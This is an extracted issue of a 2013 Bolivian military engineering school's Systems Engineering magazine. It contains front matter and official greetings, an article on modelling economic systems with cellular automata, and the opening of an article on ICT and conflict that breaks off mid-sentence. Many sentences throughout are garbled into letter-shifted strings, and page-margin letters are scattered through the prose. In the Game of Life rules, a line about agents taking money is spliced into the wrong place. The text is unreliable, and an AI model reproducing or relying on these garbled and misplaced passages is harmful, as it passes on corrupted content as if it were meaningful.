Descargar - Escuela Militar de Ingeniería

Anuncio
Escuela Militar de Ingeniería, Carrera de ingeniería de Sistemas,Unidad Académica La Paz
La Paz, Noviembre de 2013
EQUIPO EDITORIAL:
Director:
Director vitalicio
Editor:
Diagramación:
Tcnl. DIM. Julio Cesar Narváez Tamayo
Lic. Fernando Yañez Romero
Ing. Freddy Medina Miranda
Univ. Diego Feraudy Pinto
TF. CGON. Raúl Gilmar Cortez Laura
TF. CGON. Mario Rubén Ontiveros Daza
Tte. Com. Rolando Sánchez Montalvo
Diseño de la Portada: Univ. César Antonio Narváez Gutierrez
[email protected]
fyañ[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
EDICIÓN TECNICA:
Escuela militar de Ingeniería
Unidad Académica La Paz
Carrera de Ingeniería de Sistemas
Irpavi, La Paz - Bolivia
Tel. (0 591) 2775536
URL: www.emi.edu.bo
E-mail: [email protected]
Reservados todos los derechos de reproducción total o parcial del contenido de esta revista
Copyright © 2013 Ingeniería de Sistemas
P
A
R
A
D
I
G
M
A
1
P
R
A
D
I
G
M
A
2
CONTENIDO
A
PÁGINA
1. Editorial del Señor Jefe de Carrera de Ingeniería de Sistemas ............................ 3
2. Presentación del Señor Rector de la EMI ........................................................... 4
3. Presentación del Señor Vice rector de la EMI ..................................................... 5
4. Presentación del Señor Director de la Unidad Académica La Paz ..................... 6
5. Artículos de docentes ........................................................................................ 7
6. Artículos de estudiantes .................................................................................... 46
7. Proyectos de la Carrera ..................................................................................... 73
8. Actividades de la Carrera .................................................................................. 79
9. Estudiantes de la Carrera .................................................................................. 85
10. Información de las Carreras de la EMI ............................................................. 93
EDITORIAL
Hoy más que en el pasado la administración del conocimiento
juega un papel importante en la competitividad de cualquier persona, profesional, empresa y en general, cualquier organización
que proyecte un crecimiento a largo plazo. Esto muestra claramente que una de las decisiones importantes para lograr los objetivos es invertir tiempo y recursos en formación, investigación
y capacitación. Con el transcurso del tiempo, la evolución de la
Ingeniería de Sistemas, el Modelaje y la Simulación y las Tecnologías de Información y Comunicación (TIC’s) han permitido que la
investigación, la formación y capacitación estén al alcance rápido
y efectivo en cualquier momento, y esto lo conocemos hoy por un
lado como Educación Virtual o el término técnico E-Learning y por otro lado por la difusión de las
investigaciones a través de las revistas electrónicas.
,Z[L JVUJLW[V LTWPLaH WVY LS YVTWPTPLU[V KLS WHYHKPNTH X\L PKLU[PÄJHIH HS KVJLU[L PU]LZtigador como el eje de cualquier programa de profesionalización, donde sin su guía era difícil
poder tener una aprehensión de generación y transmisión del conocimiento efectiva, así como
una validación de dudas que en el transcurso del tiempo se van presentando. Con este modelo,
el sujeto que pasa a ser el eje del programa de aprendizaje por competencias es el estudiante,
y alrededor de él giran las herramientas, bibliotecas digitales, objetos de investigación y aprenKPaHQLYLKLZKLJVSHIVYHJP}U`LSTPZTVKVJLU[L`HX\LLSVIQL[P]VÄUHSLZX\LLSLZ[\KPHU[L
entienda, interiorice, investigue y practique cuantas veces quiera los temas objeto de la formación y capacitación de competencias. Todo este avance se evidencia con la tendencia mundial
que exponen los centros de formación e investigación, las empresas y las organizaciones de los
países desarrollados al implementar tecnologías E-Learning para sus sistemas de aprendizaje
por competencias, con el objetivo de optimizar los procesos de formación y capacitación y
entrenamiento al personal interno y externo en las diferentes dependencias, por medio de desarrollos innovadores de ciencia y tecnología para generar ahorros en tiempo y dinero; asimismo
lograr mejorar la calidad de la formación, de comunicación y retención de la conocimientos e
información, para que los procesos de entendimiento y adaptación a los nuevos cambios se
lleven a cabo con más y mejores resultados.
El sistema de educación virtual evidentemente debe ir estructurado en un proceso lógico pedagógico para su ejecución, y adicionalmente vincular una mezcla de diferentes niveles de laboratorios virtuales y publicación de revistas virtuales para lograr los objetivos.
Como en los demás ámbitos de la actividad humana, las TIC’s y las revistas se convierten en
instrumentos cada vez más indispensables en las instituciones educativas, empresas y desde
luego la Revista PARADIGMA se encuentra en esta línea. Esto abre y amplía el espacio educativo, aportando una interculturalidad que enriquece los sistemas de enseñanza y la difusión de las
investigaciones efectuadas por docentes y estudiantes. Los últimos veinticinco años del siglo
??LZ[mUTHYJHKVZWVY\UHHJLSLYHJP}UJYLJPLU[LKLSKLZHYYVSSVJPLU[xÄJV[LJUVS}NPJVLSJ\HSZL
THUPÄLZ[H[HU[VLUSVZJVUVJPTPLU[VZJVTVLUSHZU\L]HZTL[VKVSVNxHZX\LPU[LNYHUSVZUP]LSLZ
teórico-prácticos a través de modelos, simulaciones, pronósticos, planeamiento, diseño, etc.
,UM\UJP}UHSVL_W\LZ[VSHYL]PZ[H7(9(+0.4(ZLPKLU[PÄJHJSHYHTLU[LJVULSKPYLJJPVUHTPLU[V
estratégico de empresas, instituciones educativas y organizaciones en general, se orienta a la
formación constante del capital humano que las conforma, ya que es inevitable aceptar que es
por este capital que se logra o no el correcto funcionamiento y el éxito de éstas; adicionalmente,
el acceso al conocimiento está más al alcance con el uso de la tecnología, y por tal motivo no
podemos dejar de lado esta gran oportunidad de generar una competitividad globalizada por el
miedo a romper el paradigma cultural del uso de las nuevas herramientas tecnológicas de formación y capacitación expuestos por los trabajos en la revista que se pone a su consideración.
Tcnl. DIM. Julio Cesar Narváez Tamayo
JEFE DEPARTAMENTO INGENIERÍA DE SISTEMAS
P
A
R
A
D
I
G
M
A
3
P
R
A
D
I
G
M
A
4
RECTOR
A
Gral. Brig. Alfredo Marquina Lozada
MAGNÍFICO RECTOR DE LA ESCUELA MILITAR DE INGENIERÍA
La Escuela Militar de Ingeniería, integrante del Sistema de la Universidad Boliviana, con
una experiencia de más de 60 años formando profesionales del más alto nivel académico, está implementando nuevos planes de estudios en sus Carreras, con un modelo
académico por competencias, en el que son pilares fundamentales la investigación y la
interacción social. Los proyectos y trabajos que en estos ámbitos desarrolla la comunidad docente estudiantil y la jefatura de cada Carrera de la EMI, son valiosos aportes para
la consolidación del diseño curricular por competencias.
Como Rector de la Escuela Militar de Ingeniería, tengo la grata satisfacción de presentarles la Revista Paradigma, en su décima segunda edición, elaborada por la Carrera
KL0UNLUPLYxHKL:PZ[LTHZJVULZM\LYaVKLKPJHJP}U`ZHJYPÄJPVJ\`VJVU[LUPKVLZ\UH
T\LZ[YHKLSHJVUZ[HU[LHJ[\HSPaHJP}UWYVK\JJP}UJPLU[xÄJH`HJ[P]PKHKLZKLSHJVT\UPdad universitaria.
La Revista contribuye a la formación integral de los estudiantes, preparándolos para
actuar positivamente en las necesarias transformaciones sociales, ambientales, económicas, culturales y tecnológicas, además de ser un espacio de difusión para la Carrera
y para la EMI.
VICERRECTOR
P
A
R
Cnl. DAEN. Marco Antonio Barrero Argote
VICERRECTOR DE LA ESCUELA MILITAR DE INGENIERÍA
Representa para mí una gran satisfacción el poder dar este mensaje de salutación con
motivo de la 12va Edición de la Revista Paradigma de la Carrera de Ingeniería de Sistemas.
Nuestro país atraviesa un proceso de construcción del nuevo Estado Plurinacional, en el
cual la aspiración de lograr la soberanía tecnológica, es un anhelo de todos aquellos que
formamos parte de la comunidad académica de la Escuela Militar de Ingeniería.
Sin duda alguna, los elementos claves para lograr el desarrollo de una sociedad diversa
y plurilingüe, son la ciencia, la tecnología y la innovación. Muestras de ello existen tanto
en el viejo mundo como en nuestra América Morena.
A
D
I
Un papel determinante en este llamado siglo del conocimiento lo constituyen las Tecnologías de Información y Comunicación (TIC´s), las cuales han transformado nuestra
forma de vivir sumergiéndola en dimensiones jamás pensadas, hace unos 40 años atrás
los que éramos adolescentes cultivamos parte de nuestras relaciones sociales a través
del correo convencional, hoy a través de un clik podemos dar inicio a las relaciones soJPHSLZUVJVU\UHZPUVJVUJPLU[VZKLWLYZVUHZUVZVSVLUU\LZ[YHmYLHNLVNYmÄJHZPUV
a través del mundo entero.
G
La trasmisión y divulgación del conocimiento son esenciales para las sociedades que
desean perdurar en el tiempo, es así que esta nueva Edición de la Revista Paradigma
[PLUL\UHPTWVY[HUJPHZPNUPÄJH[P]HUVZVSVWVY[YHZJLUKLYLULSJYVUVZZPUV[HTIPtUWVY
aportar a la construcción del Vivir Bien.
M
A
5
A
R
A
D
I
G
M
A
6
DIRECTOR UALPZ
P
Cnl. DAEN. Álvaro Alfonso Ríos Oliver
DIRECTOR DE LA UNIDAD ACADÉMICA LA PAZ
Una vez más tengo el privilegio de ser partícipe de la publicación de una nueva versión
de la Revista PARADIGMA de la Carrera de Ingeniería de Sistemas. Indudablemente, un
esfuerzo de gente con un gran compromiso institucional que, a través de los años, le ha
dado continuidad a la posibilidad de plasmar y difundir artículos y trabajos de investigación de docentes y estudiantes de la Carrera.
La educación, la interacción social y la investigación son las bases de la gestión universi[HYPH;VKVLSLZM\LYaVKLZHYYVSSHKVLU[VYUVHSHPU]LZ[PNHJP}U¶WVJVT\JOVZ\ÄJPLU[L
VPUZ\ÄJPLU[LLZ[LTHKLV[YVKLIH[L¶X\LKHLULSHUVUPTH[VZPUVZLLUJ\LU[YHUSVZ
mecanismos que hagan posible la difusión interna y externa.
La posibilidad de trascender queda plasmada en las páginas de esta revista cuyas temáticas, tengo la certeza, encontrarán el interés de sus lectores y permitirán el surgimiento
de nuevas inquietudes porque, como dice José Ingenieros:
“En la historia de su sociedad solo vive el que deja rastros en las cosas o en los espíritus”.
MODELADO DE SISTEMAS
ECONÓMICOS CON
AUTÓMATAS CELULARES
Yáñez Romero Fernando – Yáñez Bernal Juan Fernando.
Calle Juan Manuel Loza 1776 – Condominio San Andrés.
4PYHÅVYLZ¶3H7Ha)VSP]PH
Telf.: 2227960
e-mail: [email protected]
RESUMEN
BREVE TEORÍA DE AUTÓMATAS CELULARES
La presente comunicación se encarga de presentar un método - herramienta adecuada para tratar
sistemas dinámicos discretos como ser los procesos socio-económicos a través de los autómatas
celulares, de ahí que el propósito de la comunicación es el de la modelación de sistemas económicos mediante el empleo de autómatas celulares.
Al respecto el establecimiento de métodos para el
modelaje no tradicional de sistemas complejo conÅPJ[P]VZVIQL[VKLLZ[\KPVKLSH0UNLUPLYxHKL:PZtemas ocupa un lugar predominante dentro de las
tareas de esta profesión actualmente, Sin embargo,
muchos de estos métodos solo permiten abordar
problemas dinámico discretos en el tiempo y en esWHJPVZPLUKVPUJHWHJLZKLYLÅLQHYLSJHYmJ[LYKPUmmico continuo de los sistemas, donde una decisión
presente afecta futuros eventos inmediatos. Dentro
de estos métodos no tradicionales se encuentran
los Autómatas Celulares que se caracterizan por
absolver la anterior restricción de ahí que es una de
las herramientas que necesariamente debe saber
utilizar un Ingeniero de Sistemas.
Un autómata celular constituye un sistema dinámico discreto que es una colección de células idénticas que se encuentran conectadas entre sí. Todas
las células conforman la denominada red del autómata celular. Estas redes pueden ser de distintos
tipos y diferentes en cuanto a las dimensiones y la
forma de las células.
INTRODUCCIÓN
En las simulaciones de los procesos sociales y económicos desde hace tiempo son ampliamente utilizados los métodos matemáticos tradicionales tales
como: las expresiones de la dinámica del proceso en
términos de ecuaciones diferenciales y en diferenJPHZÄUP[HZ`Z\ZZVS\JPVULZHUHSx[PJHZVU\TtYPJHZ
posteriores. Sin embargo actualmente una solución
prometedora para las áreas problemáticas de la
descripción matemática de los fenómenos sociales
y económicos viene a ser el empleo de enfoques no
tradicionales para la construcción de modelos matemáticos. Entre estos enfoques se tiene en particular
los modelos basados en autómatas celulares que
vienen a ser sistemas discretos cuyo comportamiento está completamente determinado por la dependencia del entorno local en el tiempo y en el espacio.
En si cada célula viene a ser una maquina de estaKVZ ÄUP[VZ J\`V LZ[HKV LZ[m KL[LYTPUHKV WVY SVZ
estados de las células vecinas y posiblemente de
la propia célula. En general los autómatas celulares
tienen las siguientes propiedades:
El cambio de los valores de todas las células o celdas ocurre simultáneamente después de calcular el
nuevo estado de cada célula de la red
La red o parrilla es homogénea, es decir es imposible distinguir entre dos regiones de la red a través
del universo bajo estudio, en cuanto a su naturaleza. Las interacciones son locales, es decir solo las
JtS\SHZKLSHaVUHKLSLU[VYUVSVJHSW\LKLUPUÅ\PY
en esta célula, lo que da lugar a los distintos tipos
de vecindades.
,SJVUQ\U[VKLLZ[HKVZKLSHZJtS\SHZLZÄUP[V<UV
de los ejemplos más simples de autómatas celulares viene a ser el famoso “Juego de la Vida” que fue
propuesto por John Horton Conway en 1970.
REGLAS DEL JUEGO DE LA VIDA
Si para cierta célula viva o muerta (ocupada o desocupada) se tiene exactamente tres de sus células
vecinas ocupadas entonces la célula en cuestión
estará ocupada o viva en el siguiente momento del
tiempo.
Si para cierta célula ocupada están también ocupadas dos de sus células vecinas entonces esta
P
A
R
A
D
I
G
M
A
7
P
A
célula estará ocupada en el siguiente momento del
tiempo.
Se desplaza o mueve a esta celda y coge todo el
dinero que se encuentra en esta celda.
En todos los otros casos o situaciones entonces
en el siguiente momento del tiempo esta célula se
encontrara desocupada o muerta. ( es decir si la
población es demasiado densa o viceversa entonces esto lleva a la imposibilidad de sobrevivencia
de la vida)
De esta manera la cantidad de activos del agente
se adiciona lo obtenido a lo que había previamente
y se resta los gastos requeridos en este intervalo de
tiempo. De hecho el agente muere si no dispone de
recurso, es decir entra en quiebra.
MODELADO DE MERCADO BASADO EN EL
JUEGO DE LA VIDA
R
A
D
I
G
Para la construcción de este modelo se asume que
LSLZWHJPVLZ[mKLÄUPKVKLSHZPN\PLU[LTHULYH!
La red es bidimensional
En cada célula o celda se muestra el número actual
KLSVZYLJ\YZVZÄUHUJPLYVZ`SHJHU[PKHKTm_PTHKL
estos que puede existir en cada celda.
La distribución o asignación de estos recursos se
concreta en el espacio de modo que por lo general los picos están ubicados en el norte-este y el
sur-oeste.
7VYV[YHWHY[LLSTVU[VKLSVZYLJ\YZVZÄUHUJPLYVZ
de la célula o celda se reduce hasta el nivel máximo
de la función rampa. (Se asume que el comportamiento del consumidor es similar en los distintos
mercados y en la actitud respecto a los diferentes
grupos de productos).
7HYHJHKHHNLU[LZLLZWLJPÄJHSHJHU[PKHKKLYLJ\YZVZÄUHUJPLYVZX\LKLILUZLYJVUZ\TPKVZWVY
unidad de tiempo.
Cada agente tiene un stock de recursos que puede llevar consigo de una célula a otra (variable). En
este caso no importa si el agente recibe fondos a
través de la venta de bienes o por otra forma de
recaudación de fondos.
M
El agente puede o tiene la capacidad de observar
su entorno local o vecindad y en base a esto se
puede desplazar a las celdas vecinas en base a las
siguientes reglas de comportamiento de los agentes.
A
Inspecciona las células disponibles a la vista y seSLJJPVUHSHZJLSKHZ]HJxHZJVUTmZYLJ\YZVZÄUHUcieros.
8
Si hay mas de una de estas celdas, entonces elige
la mas cercana.
+LOLJOVHÄUKLTVKLSHYSHPUUV]HJP}UKLSJVTportamiento de los agentes de la celda, además de
la cantidad de recursos se establece otra característica que viene a ser “el grado de innovación”, es
decir el nivel de distinción del negocio (productos/
servicios/tecnología) en el agente que esta presente en el momento dado. En si el nivel de innovación
LZWYVWVYJPVUHSHSHJHU[PKHKKLYLJ\YZVZÄUHUJPLros adicionales que serán deducidos de sus activos
o que será agregado a ella (como porcentaje de las
células disponibles) después de que el agente ha
sido transferido a esta celda. La opción de perdida/ganancia se elige aleatoriamente, toda vez que
se toma en cuenta que la función de probabilidad
viene dada por el experimentador obtenida de los
datos empíricos. Desde luego que se asume que
esta distribución es desconocida para el agente,
por lo que de esta manera se tiene una manera de
emular el grado de incertidumbre de los resultados
del proceso de innovación.
La selección de las celdas se realiza sobre la base
de considerar la innovación, sin embargo es distinto para diferentes agentes: El innovador suma el
ILULÄJPV`S\LNV[VTHSHKLJPZP}UHJLYJHKLSW\U[V
donde se desplazara, mientras que el conservador
disminuye, además se puede dar un intervalo del
grado de innovación de los agentes (que suma/resta solo parte del activo potencial).
De esta manera aparece la posibilidad de análisis
KL JYLJPTPLU[V KL SH JVUÄN\YHJP}U LU [VYUV H SVZ
brotes de diferentes grados de estrategias de innovación. Al cambiar los parámetros de los agentes
(el grado de innovación, es decir la aversión al riesgo) y los parámetros del entorno de las células se
debe cuidar el grado de incertidumbre (es decir que
la probabilidad no sea negativa), además el nivel
de rentabilidad (es decir la relación entre los costos
durante la transición de una célula a otra respecto
al nivel de ingresos).
De este modo es posible obtener situaciones típiJHZ X\L ZL W\LKLU PKLU[PÄJHY JVU SHZ LZ[YH[LNPHZ
reales de las pequeñas empresas innovadoras.
La presencia en el campo de una gran cantidad de
agentes que disponen de reservas medianas de re-
J\YZVZÄUHUJPLYVZOHJLX\LLSUP]LSKLTVY[HSPKHK
sea mediano, esta situación del modelo es tal que
se corresponde con estrategias reales de la categoría de búsqueda desintegrado.
La presencia en el campo de una gran media de
agentes que disponen de grandes reservas de reJ\YZVZÄUHUJPLYVZOHJLX\LLSUP]LSKLTVY[HSPKHK
sea mediano y su comportamiento tipo sea el de
innovador selectivo.
MODELO DE DESARROLLO Y GESTIÓN DE
TOMA DE DECISIONES
Se considera el siguiente ejemplo de modelación
del comportamiento de una organización.
Cada célula viene a ser una organización concreta, la cual puede con grado diferente y en distintos
intervalos de tiempo cumplir las órdenes recibidas.
Así existen las siguientes posibilidades de reacción
de cada objeto de análisis:
Cumplir con la orden o disposición completamente,
es decir a un nivel adecuado, con la calidad deseada y en el tiempo estipulado.
Cumplir con la disposición parcialmente en el intervalo de tiempo considerado.
Cumplir con la disposición completamente pero en
un intervalo de tiempo mayor al establecido.
En principio no cumplir con la disposición requerida, en particular se reconduce la orden hacia otra
organización.
El modelo de autómata celular que se obtiene resultado de estos supuestos considera que reacciones
semejantes del objeto se determinan bajo ciertas
reglas constantes para la célula dada en el transcurso de cierto intervalo de tiempo. Estas reglas
para una organización concreta de control tiene un
JHYmJ[LY LZWLJPÄJV ` YLÅLQH SHZ WVZPIPSPKHKLZ WYVfesionales y psíquicas particulares de los dependientes del microclima del contenido y el numero
de otros participantes que han recibido al mismo
tiempo la orden o disposición, así como de las relaciones con otras organizaciones y sus direcciones,
etc.
La selección de una determinada acción lleva un
carácter probabilístico. Una distribución concreta
de estas reacciones depende de las particularidades dadas de una señal concreta que llega a ella
como entrada, es decir en este caso la particularidad de la disposición u orden obtenida.
Para el desarrollo de las reglas de comportamiento
de todas las células del autómata de la clase dada
en primer lugar es necesario determinar aquellos
que son comunes para todos sus factores, es decir
las características de las señales de entrada (ordenes) en dependencia de las cuales, las células
eligen un determinado carácter de sus reacciones.
Las características mas importantes de las ordenes
que determinan la reacción de la organización vienen a ser las siguientes:
1.- Su complejidad, que es un indicador agregado que conlleva un carácter objetivo, es deJPY UV KLWLUKL SH J\HSPÄJHJP}U KLS WLYZVUHS
de una unidad o departamento concreto, de
la productividad de su trabajo, etc. Además
que incluye los siguientes momentos:
:\NYHKVKLTV[P]HJP}UX\LYLÅLQHLSPU[LYtZ
del personal de la unidad o departamento en
la ejecución de una orden recibida.
3.- Su grado de compromiso que determina la
presión sobre el personal de la unidad o departamento por parte de la dirección o de
la gerencia que esta interesada en el cumplimiento de la orden recibida. Cada uno de
estos tres factores puede tomar distintos valores, por ejemplo: bajo, medio y alto. Para la
descripción de cada celda del autómata celular se requiere sobre la base de base una información estadística determinada o a través
de la observación formular reglas individuales
de comportamiento de los objetos analizados
para cada uno de las posibles combinaciones
de los valores de los factores, considerados.
P
A
R
A
D
I
Sobre la base de la información obtenida se podrá:
Determinar las zonas de carga máxima y mínima
dentro de la estructura organizativa bajo el diseño y
toma de decisiones de control, en particular las zonas de sobrecarga según sus elementos y periodos
de tiempo.
G
Determinar en la organización las zonas de máxima y mínima carga, lo más complejo en particular
es la no estandarización de la carga de trabajo y
la creatividad y también las soluciones de control
obligatorias y atractivas.
M
Analizar las más importantes unidades o departamentos de enlaces de comunicación presentes.
Analizar la estructura de los contenidos de trabajo
de cada una de las unidades o departamentos de
gestión y control, es decir la fracción de cada uno
de los tipos obtenidos en su carga general o total,
así como en términos de la cantidad de este ultimo
y en el tiempo de ejecución.
A
9
P
Elegir y separar las combinaciones mas típicas de
los distintos tipos de problemas que se concretan
por cada una de los departamentos o unidades, en
particular en los periodos de sobrecarga máxima.
A
Determinar en cuanto son complejas (la sobrecarga, la estandarización y la creatividad) las actividades de la unidad o departamento y también como
se relaciona motivación interna con las presiones
externas.
R
A
D
I
G
M
A
10
En principio una dirección fundamental de empleo
de este tipo de modelo de autómatas celulares viene a ser la posibilidad de formular el pronóstico de
comportamiento de la organización desde el punto
de vista del desarrollo y ejecución de las decisiones
de control para distintas variantes de la estructura
de la organización para distintas obligaciones y esquemas de reorganización.
Partiendo del supuesto que la regla de respuesta
de cada una de las celdas del autómata celular
LZ SV Z\ÄJPLU[LTLU[L LZ[HISL WHYH JPLY[V PU[LY]HSV
de tiempo bajo la provisión de los parámetros de
SHZ VYKLULZ KLS Å\QV KL LU[YHKH LU LS ZLU[PKV KL
las características dadas es posible pronosticar el
comportamiento de cada una de las unidades o departamentos y aquellos problemas importantes con
los cuales se enfrenta como resultado de la reorganización.
La información fuente necesaria para la modelación, en este caso viene a ser:
‹ ,SJHTIPVKLSHZJHYHJ[LYxZ[PJHZKLSVZ[PWVZ
fundamentales de órdenes, en el sentido de
su complejidad, responsabilidad y motivación.
‹ *VTV YLZ\S[HKV KL LZ[H TVKLSHJP}U ZL WVdrá pronosticar los siguientes momentos:
‹ +L[LYTPUHY SHZ aVUHZ ` WLYPVKVZ KL WVZPISL
sobrecar5ga de la estructura organizativa y
también las unidades que realizaran las más
complejas decisiones de control responsable
y atractivo.
‹ 0KLU[PÄJHY SVZ WYPUJPWHSLZ WYVISLTHZ X\L ZL
pueden enfrentar las unidades, incluyendo la
MHS[HKLMVYTHJP}USHJ\HSPÄJHJP}USHMHS[HKL
WYVJLKPTPLU[V LZWLJxÄJV WHYH SH HWSPJHJP}U
de determinadas decisiones, etc.
‹ 0KLU[PÄJHYHSHZ\UPKHKLZKLPU[LYJVUL_P}UKL
las comunicaciones mas importantes.
Este tipo de pronostico permite con anterioridad
desarrollar propuestas para el ajuste de la precisión
de la estructura organizativa, en particular los cambios en el número de unidades, cambios en la lista
de responsabilidades del trabajo, mejora en el nivel
general de habilidades, motivación, etc.
Por lo tanto, el uso del esquema dado de investigación y análisis de los procesos de desarrollo y
la toma de decisiones en la organización debe ser
capaz de contribuir a la eliminación de una serie de
factores que afectan negativamente la calidad de
las decisiones y para desarrollar una versión veriÄJHKHWHYHSHTLQVYHKLSHLZ[Y\J[\YHVYNHUPaH[P]H
CONCLUSIONES Y RECOMENDACIONES
En general cabe señalar que el autómata celular ha
sido utilizado para el modelado de sistemas económicos, cumpliendo de esta manera con los propósitos del trabajo propuesto, Sin embargo este
trabajo puede trascender en otras áreas del conocimiento, sobre todo las ligadas a los procesos sociales y económicos, campos donde aun el empleo
de autómatas celulares no han sido ampliamente
utilizados, así pues que nuestra comunicación en
nuestro medio realiza los primeros pasos en la difusión de la utilización de autómatas celulares en
el establecimiento del comportamiento de sistemas
socio-económicos,
REFERENCIAS BIBLIOGRÁFICAS
‹ Modelación de la Dinámica Sociopolítica y Económica, M RSSu, 2004.
‹ Autómatas Celulares, Implementación y Experimentación, Lev Nauman, 2009.
‹ El Juego de la Vida, www.artsoc.ru/lifemodel.
htm, 2009
‹ Comportamiento y Estrategia de las Pequeñas
empresas Innovadoras y Simulación Basada en
SH*YLHJP}UKL*VT\UPKHKLZ(Y[PÄJPHSLZ, A. Platonov, 2011
‹ Mejora de los Procesos de Desarrollo y Toma de
Decisiones en la Educación Superior, N. Titova,
2004.
TENDENCIAS DE LA EVOLUCIÓN
DE LAS TECNOLOGÍAS DE
INFORMACIÓN Y COMUNICACIÓN
Y EL CONFLICTO
P
A
Cnl. DAEN. Álvaro A. Ríos Oliver
RESUMEN
El impacto de las Tecnologías de Información y Comunicación es insoslayable a todos los ámbitos del
quehacer humano. En el mundo actual, los descuIYPTPLU[VZJPLU[xÄJVZ`LSH]HUJL[LJUVS}NPJVJVUsecuente, poseen una importancia decisiva en el
desarrollo integral de los países y en el bienestar de
sus habitantes. No hay un esquema universal para
alcanzar la sociedad de alto desarrollo que se desea alcanzar pero, los países que renuncian a crecer rápidamente, o no encuentran la alquimia necesaria para hacerlo, están condenados de manera
inexorable a la dependencia externa. La industria
de la Defensa y Seguridad ha abordado permanentemente un proceso de reestructuración apostando
decididamente por la innovación tecnológica.
ABSTRACT
The Impact of Information and Communication
Technology is inevitable to all areas of human enKLH]VY0U[VKH`»Z^VYSKZJPLU[PÄJKPZJV]LYPLZHUK
technological progress consequent, have a decisive importance in the development of countries and
the welfare of its inhabitants. There is no universal
scheme for highly developed society to be achieved but waive countries grow rapidly, or alchemy
are not required to do so, are doomed inexorably
to the external dependency. Defence Industry and
Security has addressed a restructuring process
permanently betting strongly on technological innovation.
INTRODUCCIÓN
La tecnología ya ha ampliado el alcance de los conÅPJ[VZKLSVZLU[VYUVZKLSH[PLYYHTHY`HPYLWHYH
incluir el ciberespacio y el espacio. Ofrece nuevas
WVZPIPSPKHKLZWHYHLSJVUÅPJ[V`LZL_WSV[HKHH[YHvés de innovaciones en la organización, estrategia y
la táctica. La rápida innovación tecnológica tendrá
\UPTWHJ[VZPNUPÄJH[P]VLULSJHYmJ[LYL]VS\[P]VKL
SVZJVUÅPJ[VZ:LN\PYmZPLUKV\UHYTHKLKVISLÄSV
que ofrecerá ventajas a las grandes potencias capaces de pagar las tecnologías más avanzadas, así
como también a los empresarios y los innovadores
que colaboran para encontrar nuevos usos para las
tecnologías existentes. Estos empresarios, incluyendo los Estados más pequeños y los actores no
estatales, rápidamente serán capaces de adaptar
las estrategias, mientras que las
grandes potencias son todavía propensas a sufrir
KLSHPULYJPHPUZ[P[\JPVUHS`SHYLZPZ[LUJPHÄUHUJPLYH
asociadas a los programas de armas de gran tamaño.
Es probable que la vanguardia del desarrollo tecnológico continúe cambiando desde el Estado
hacia el sector comercial. La proliferación de los
sistemas comerciales y tecnologías permitirá que
aliados y adversarios sean equipados de forma similar, si pueden permitirse el lujo de comprar en el
mercado abierto. Estados en desarrollo y actores
no estatales serán capaces de explotar rápidamente tecnologías nuevas y en evolución a bajo coste,
para obtener una ventaja asimétrica. Sin embargo,
la tendencia hacia el sector comercial puede ralentizar o incluso invertirse a medida que los Estados
se centran en su propio interés e invierten en investigación para combatir el cambio climático, la
escasez de recursos y otros desafíos.
+LZKL LS ÄUHS KL SH .\LYYH -YxH SVZ TH`VYLZ WYVveedores de armas convencionales a los mercados
internacionales han sido los EE.UU., Rusia, Alemania, Francia y el Reino Unido. Los principales
compradores han sido China y la India, con Asia
contabilizando el 37% del comercio, Europa 23%,
y Oriente Medio el 22% (SIPRI, 2008).
El nivel general de las transferencias se ha incrementado desde un mínimo en 2002 y está valorado
en alrededor de $ 45 millones al año. Requerimientos adelantados sugieren que es probable que el
R
A
D
I
G
M
A
11
P
A
R
A
D
I
G
M
A
12
volumen de transferencias internacionales de armas aumente durante la primera mitad del períoKV ` X\L (YHIPH :H\KP[H 3PIPH ` ;HP^mU ÄN\YHYxHU
como los principales importadores.
Los desafíos estratégicos que en el futuro enfrentarán las grandes potencias es poco probable que
se resuelvan por sí solos por el efecto mágico de
la tecnología. Sin embargo, los Estados más ricos,
especialmente aquellos con poblaciones en ajuste,
puede verse seducidos en favor de complejas soluciones tecnológicas por sobre enfoques humanos
TmZ[YHKPJPVUHSLZHWLZHYKLKPÄJ\S[HKLZWHYHJ\brir los costos asociados.
El predominio de la calidad tecnológica sobre la
JHU[PKHK LQLTWSPÄJHKV WVY SHZ MHZLZ JVU]LUJPVnales de combate de las guerras del Golfo, donde
SHTHZHM\LZ\Z[P[\PKHWVYHYTHTLU[VZVÄZ[PJHKV
y mejoras en la organización y la formación, será
KLZHÄHKV ,S ]HSVY KL SV O\THUV ZLN\PYm ZPLUKV
crítico en las operaciones centradas en las perZVUHZKVUKLSHPUÅ\LUJPHLZKL]P[HSPTWVY[HUJPH
y algunas tareas militares seguirán siendo intensivas en mano de obra y equipos. La tendencia
hacia sistemas de armas altamente especializados, que prevaleció durante la Guerra Fría,
ha dado lugar a su adaptación para su uso en
nuevos contextos. Sin embargo, los altos costos asociados, tecnologías nuevas de armas y
la gran cantidad de posibles tareas que pueden
enfrentar los militares hacen que las armas simples, versátiles y cinéticas sean invaluables. Esto
es cierto para países desarrollados, pero también
para actores irregulares que tratan de utilizar las
HYTHZ ZLUJPSSHZ ÅL_PISLZ ` KL IHQV JVZ[V [HSLZ
como artefactos explosivos improvisados para
SVNYHY LMLJ[VZ LU [VKVZ SVZ UP]LSLZ KL JVUÅPJ[V
La tecnología inevitablemente se extiende y ninguna fuerza militar ha disfrutado del monopolio a
perpetuidad de cualquier capacidad. Es probable
que la ventaja tecnológica disfrutada por Occidente desde 1945, sea erosionada por la difusión tecnológica y el fortalecimiento de la Investigación y
Desarrollo (I + D), particularmente en Asia, que se
alimenta a través de la producción de armas. Por
ejemplo, en algunas áreas, es probable que el material militar chino para su exportación a potenciales adversarios sea comparable a los equipos europeos proyectados para el año 2020 y se aproximen
los estándares de los EE.UU. para el 2040 (Bowns y
Middleton, 2006). Es probable que la paridad tecnológica se constituya en un desafío al paradigma
occidental de la guerra, que la tecnología puede
sustituir a la masa y dar lugar a un efecto rápido y
decisivo (Bowns y Cornish, 2009).
Por otra parte, es probable que el combate entre
adversarios igualmente emparejados resulte en
una escalada del número de bajas. Este cambio
de paradigma también requiere la capacidad de
WSHUPÄJHYWHYHTVKVZKLJVUÅPJ[VJVUHK]LYZHYPVZ
que alcancen capacidades clave de alta tecnología
y empleen conceptos innovadores de operación
(RAND, 2009).
Por ejemplo, los poderes regionales armados con
misiles guiados de precisión y tecnologías anti-acceso, tales como los submarinos, misiles de cruJLYV`ZVÄZ[PJHKVZTPZPSLZ[PLYYHHPYLW\LKLOHJLY
que la proyección de estrategias tradicionales de
poder sea inviable.
El desarrollo de sistemas en red va a continuar. El
acceso a la información estimulará el conocimiento
